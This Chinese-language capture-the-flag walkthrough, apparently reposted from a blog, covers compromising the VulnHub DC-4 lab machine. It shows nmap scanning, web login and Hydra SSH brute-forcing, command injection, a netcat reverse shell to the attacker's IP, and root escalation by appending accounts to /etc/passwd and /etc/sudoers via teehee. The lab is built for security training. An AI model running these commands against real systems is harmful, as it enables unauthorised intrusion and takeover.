DC-4靶机渗透
<h1 id="dc-4靶机渗透">DC-4靶机渗透</h1><code>靶机地址:https://www.vulnhub.com/entry/dc-4,313/
难度:低
目标:获得 root 权限
DC-4靶机是网络安全渗透测试中常见的虚拟靶机,主要用于模拟真实攻击场景。以下是基于多个来源的渗透测试流程总结:
不同环境中靶机IP可能不同(如192.168.77.143、192.168.172.135),需根据实际扫描结果调整操作。
部分步骤需结合:ml-search-more{text="Burp Suite"}抓包、修改请求参数等工具辅助完成。
</code>
<h2 id="一主机发现">一.主机发现</h2>
<h2 id="nmap主机发现">nmap主机发现</h2>
<h3 id="1查看网段">1.查看网段</h3>
<code >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>mtu 1500
inet 192.168.65.132netmask 255.255.255.0broadcast 192.168.65.255
inet6 fe80::20c:29ff:fed4:313aprefixlen 64scopeid 0x20<link>
ether 00:0c:29:d4:31:3atxqueuelen 1000(Ethernet)
RX packets 9bytes 1313 (1.2 KiB)
RX errors 0dropped 0overruns 0frame 0
TX packets 24bytes 4079 (3.9 KiB)
TX errors 0dropped 0 overruns 0carrier 0collisions 0
</code>
<h3 id="2扫描ip">2.扫描ip</h3>
<code >└─# sudo nmap -sn 192.168.65.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:17 EDT
Nmap scan report for 192.168.65.1
Host is up (0.00036s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.00023s latency).
MAC Address: 00:50:56:FA:BF:D8 (VMware)
Nmap scan report for 192.168.65.148
Host is up (0.00022s latency).
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.00020s latency).
MAC Address: 00:50:56:EB:5F:6C (VMware)
Nmap scan report for 192.168.65.132
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.58 seconds
</code>
<p>由于自己的主机的ip自己熟悉我们可以</p>
<code>192.168.65.148
</code>
<h3 id="3扫描端口">3.扫描端口</h3>
<code > nmap -sT --min-rate 10000 -p- 192.168.65.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:19 EDT
Nmap scan report for 192.168.65.148
Host is up (0.0010s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp openssh
80/tcp openhttp
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.11 seconds
</code>
<p><strong>发现开放了22,80端口</strong></p>
<p><strong>TCP扫描</strong></p>
<code >nmap -sT -sV -sC -O -p80,22 192.168.65.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:21 EDT
Nmap scan report for 192.168.65.148
Host is up (0.00053s latency).
PORT STATE SERVICE VERSION
22/tcp openssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp openhttp nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.28 seconds
</code>
<p><strong>UDP扫描</strong></p>
<code >nmap -sU --top-ports 20 192.168.65.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:23 EDT
Nmap scan report for 192.168.65.148
Host is up (0.00042s latency).
PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp closed netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp closed syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udpopen|filtered ms-sql-m
1900/udpopen|filtered upnp
4500/udpclosed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:7A:03:D1 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 8.19 seconds
</code>
<p><strong>默认脚本扫描</strong></p>
<code >nmap --script=vuln -p80 192.168.132.148
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-10-26 05:25 EDT
Nmap scan report for 192.168.132.148
Host is up (0.00046s latency).
PORT STATE SERVICE
80/tcp filtered http
Nmap done: 1 IP address (1 host up) scanned in 11.77 seconds
</code>
<h2 id="二web渗透">二.web渗透</h2>
<p><strong>浏览器访问</strong></p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210319641-131282067.png" alt="image-20251026172723969" loading="lazy"></p>
<p><strong>发现登入框尝试字典爆破</strong></p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210320612-14908294.png" alt="image-20251026173430920" loading="lazy"></p>
<h3 id="密码爆破">密码爆破</h3>
<p><strong>然后爆破密码使用自己的字典爆破密码,观察长度</strong></p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321072-554888442.png" alt="image-20251026173555682" loading="lazy"></p>
<p>发现密码</p>
<code>happy
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321360-1410990119.png" alt="image-20251026173715360" loading="lazy"></p>
<p>登入成功好像可以执行命令</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210321698-1693952084.png" alt="image-20251026173746987" loading="lazy"></p>
<p>抓包修改查看/etc/passwd</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322063-1167692198.png" alt="image-20251026173859875" loading="lazy"></p>
<code>charles:x:1001:1001:Charles,,,:/home/charles:/bin/bash
这个有bash权限
</code>
<h3 id="命令执行拿shell">命令执行拿shell</h3>
<p>我们尝试反弹shell</p>
<code>命令执行
nc 192.168.65.132 4444 -e /bin/bash
接收
nc -lvnp 4444
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322454-1674748222.png" alt="image-20251026174253482" loading="lazy"></p>
<p>成功反弹成功</p>
<p>提升交互性</p>
<code >python -c "import pty;pty.spawn('/bin/bash')"
</code>
<p>简单查看文件</p>
<p>查看home目录</p>
<code>cd /home
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210322883-239742851.png" alt="image-20251026174618100" loading="lazy"></p>
<p>然后查看用户目录的内容</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210323268-392189122.png" alt="image-20251026174803049" loading="lazy"></p>
<p>发现在jim目录下的backups中发现旧密码</p>
<code >www-data@dc-4:/home/jim/backups$ ls
ls
old-passwords.bak
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1
</code>
<p>将其复制保存为<strong>password.txt</strong></p>
<h3 id="使用hydra爆破">使用hydra爆破</h3>
<code >hydra ssh://192.168.65.148 -l jim -P password.txt -vV
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210323622-638709950.png" alt="image-20251026180122239" loading="lazy"></p>
<p>成功爆破</p>
<code> host: 192.168.65.148 login: jim password: jibril04
</code>
<h3 id="ssh登录"><strong>ssh登录</strong></h3>
<code>ssh jim@192.168.65.148
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324006-2103683866.png" alt="image-20251026180337525" loading="lazy"></p>
<code >然后说我有应该mail
去看看
You have mail.
Last login: Sun Apr7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ ls
backupsmboxtest.sh
jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is:^xHhA&hvim0y
See ya,
Charles
</code>
<p>得到密码</p>
<code>Password is:^xHhA&hvim0y
See ya,
Charles
</code>
<code>im@dc-4:/var/mail$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
password for jim:
Sorry, user jim may not run sudo on dc-4.
jim@dc-4:/var/mail$
</code>
<p>没有sudo</p>
<h3 id="提权">提权</h3>
<code>只能使用
find / -perm -u=s -type f 2>/dev/null
</code>
<code>在根目录 / 下递归查找所有文件(-type f)
**这些文件的权限中,**用户(owner)拥有 SUID 权限(-perm -u=s)
并将所有错误输出(如权限拒绝)重定向到 /dev/null,即不显示错误信息(2>/dev/null)
</code>
<code >jim@dc-4:/var/mail$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/exim4
/bin/mount
/bin/umount
/bin/su
/bin/ping
/home/jim/test.sh
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324535-267946719.png" alt="image-20251026181116087" loading="lazy"></p>
<code>su可用
</code>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210324968-1942921237.png" alt="image-20251026181253556" loading="lazy"></p>
<p>发现成功登入</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210325344-1004865647.png" alt="image-20251026181334863" loading="lazy"></p>
<p>然后直接提权就可以</p>
<code>echo "aa::0:0:::/bin/bash" I sudo teehee -a /etc/passwd
echo "aacc::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
</code>
<h4 id="方法一teehee提权">方法一:teehee提权</h4>
<p>teehee 可以把写入文件内容并不覆盖文件原有内容,功能与tee命令相似</p>
<p>使用 udo -l 查看charles用户的权限,根据显示可以利用teehee来提权</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210325685-668830447.png" alt="image-20251026205327164" loading="lazy"></p>
<p>输入命令:echo "M1ke::0:0:::/bin.bash" | sudo teehee -a /etc/passwd</p>
<p>创建一个00用户,用户名为“M1ke”,追加到/etc/passwd 中</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326055-425567159.png" alt="image-20251026205402913" loading="lazy"></p>
<p>切换倒“M1ke”用户便提权成功了</p>
<h4 id="方法二-sudoers提权">方法二 sudoers提权</h4>
<p>这种方法是根据b站一位UP主的视频学习的</p>
<p>先查看sudoers文件,复制该命令</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326380-191673642.png" alt="image-20251026205505171" loading="lazy"></p>
<p>在charles 用户下输入命令:</p>
<p>echo "%charles ALL=(ALL:ALL) ALL" | sudo teehee -a /etc/sudoers</p>
<p>现在就将用户增加到了sudoers的权限中,密码还是原来charles的密码。</p>
<p><img src="https://img2024.cnblogs.com/blog/3621557/202510/3621557-20251026210326727-2087584331.png" alt="image-20251026205725530" loading="lazy"></p>
<p>成功提权</p><br>来源:程序园用户自行投稿发布,如果侵权,请联系站长删除<br>免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! 不错,里面软件多更新就更好了
页:
[1]